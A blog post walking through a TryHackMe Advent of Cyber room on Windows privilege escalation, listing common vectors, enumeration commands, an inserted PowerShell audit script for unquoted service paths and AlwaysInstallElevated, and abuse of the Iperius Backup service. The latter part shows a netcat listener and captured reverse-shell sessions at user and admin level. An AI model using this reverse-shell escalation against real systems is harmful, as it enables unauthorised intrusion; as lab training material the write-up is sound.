AoC3#13: They Lost The Plan!

Today’s CTF challenge in TryHackMe’s Advent of Cyber is all about privilege escalation on a Windows box.

After a bit of story, we’re told of several privilege escalation avenues on a Windows box. They include:

A few common vectors that could allow any user to increase their privilege levels on a Windows system are listed below:

  • Stored Credentials: Sometimes people store their top-secret credentials in easily accessible & readable places.
  • Windows Kernel Exploit: The Windows operating system may have a known vulnerability that can be exploited to increase privilege levels.
  • Insecure File/Folder Permissions: In some situations, even a low privileged user can have read or write privileges over files and folders that can contain sensitive information.
  • DLL Hijacking: Applications use DLL files to support their execution. If the DLL is missing, or we replace it with our own, the malicious DLL will run with the main application’s privilege level.
  • Unquoted Service Path: If the executable path of a service contains a space and is not enclosed within quotes, a hacker could introduce their own malicious executables to run instead of the intended executable.
  • Always Install Elevated: Windows applications can be installed using Windows Installer (also known as MSI packages) “AlwaysInstallElevated” policy. This allows the installation process to run with administrator privileges without requiring the user to have these privileges.

The CTF challenge also gives us some basic enumeration commands. I use xfreerdp to remote into the target machine:

$ xfreerdp /u:{user} /p:{pass} /v:10.10.201.177

I noticed this when the remote desktop session connected; it made me chuckle:

User Information

The net users command lists out all the users on the system:

System Information

systeminfo spits out a whole bunch of O/S info that may be useful down the line:

The challenge explains you can pipe that output through a string finder to pull out just the lines you care about, such as:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Windows Services

The wmic service list command dumps out a whole ream of services, their installation paths, status etc. You’d need some findstr or pipe action here as the output is almost unreadable – but it’s probably a wealth of info.
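As an added example (my own, not from the room or the original post), the same service enumeration done in PowerShell, filtered down to the two misconfigurations from the vector list that are easiest to audit on a host: unquoted service paths containing spaces, and the AlwaysInstallElevated policy. It assumes it is run in an elevated PowerShell prompt on the Windows machine so that every service’s path is readable.

```powershell
# Added audit example, not part of the TryHackMe room or the original post.
# Run from an elevated PowerShell prompt on the Windows host being checked.

function Get-UnquotedServicePath {
    # Win32_Service is the same data `wmic service list` prints.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        # Quoted paths and empty paths (kernel drivers) are not affected.
        if (-not $path -or $path.StartsWith('"')) { return }
        # The binary is everything up to and including the first ".exe";
        # anything after that is arguments (-split is case-insensitive).
        $exe = ($path -split '\.exe')[0] + '.exe'
        if ($exe -match ' ') {
            [pscustomobject]@{
                Name      = $_.Name
                StartMode = $_.StartMode
                RunsAs    = $_.StartName   # account the service runs under
                PathName  = $path          # fix: wrap the path in quotes
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    # The policy only takes effect when the value is 1 in BOTH hives.
    $name = 'AlwaysInstallElevated'
    $sub  = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty -Path "HKLM:\$sub" -Name $name -ErrorAction SilentlyContinue).$name
    $hkcu = (Get-ItemProperty -Path "HKCU:\$sub" -Name $name -ErrorAction SilentlyContinue).$name
    [pscustomobject]@{
        MachinePolicy = $hklm
        UserPolicy    = $hkcu
        Misconfigured = ($hklm -eq 1 -and $hkcu -eq 1)
    }
}

'== Services with unquoted paths containing spaces =='
Get-UnquotedServicePath | Format-Table -AutoSize
'== AlwaysInstallElevated policy (both must be 1 to matter) =='
Test-AlwaysInstallElevated | Format-List
```

Services flagged by the first function should have their ImagePath quoted, and a 1/1 result from the second should be reverted to 0 (or the values deleted) via Group Policy.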

I used a bunch of the information from these 3 commands to grab a bunch of CTF flags for this challenge.

Exploiting Iperius Backup Service

So this was a service I’d never heard of, but it’s installed on our target box and contains a nasty little privilege escalation vulnerability.

I opened up the backup tool and selected a folder to back up (Documents), plus a destination (Desktop), then chose to run a script before the backup starts… our payload (renamed to payload.bat):

Building the backup payload

The payload is a simple netcat reverse connection back to our host machine, which is running an nc listener on port 1337.

I executed the payload manually and received the following connection on my host machine:

└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.8.39.10] from (UNKNOWN) [10.10.201.177] 49770
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\McSkidy\Desktop>whoami
whoami
the-grinch-hack\mcskidy   

Excellent.

I then selected the saved backup job and executed it, getting this prompt:

Run as administrator – yes please!

Within 60 seconds my host nc listener got another connection:

└─$ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.8.39.10] from (UNKNOWN) [10.10.201.177] 49771
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files (x86)\Iperius Backup>whoami
whoami
the-grinch-hack\{admin-user}

Confirming we definitely have escalated our privileges. Brilliant.

Now we can use the remote cmd shell to sweep up the remaining Windows flags and finish off Day 13.

This was a fun room; it was enjoyable utilising the backup vulnerability to launch a reverse shell straight into the Windows box. Is there nothing that netcat can’t do 😉
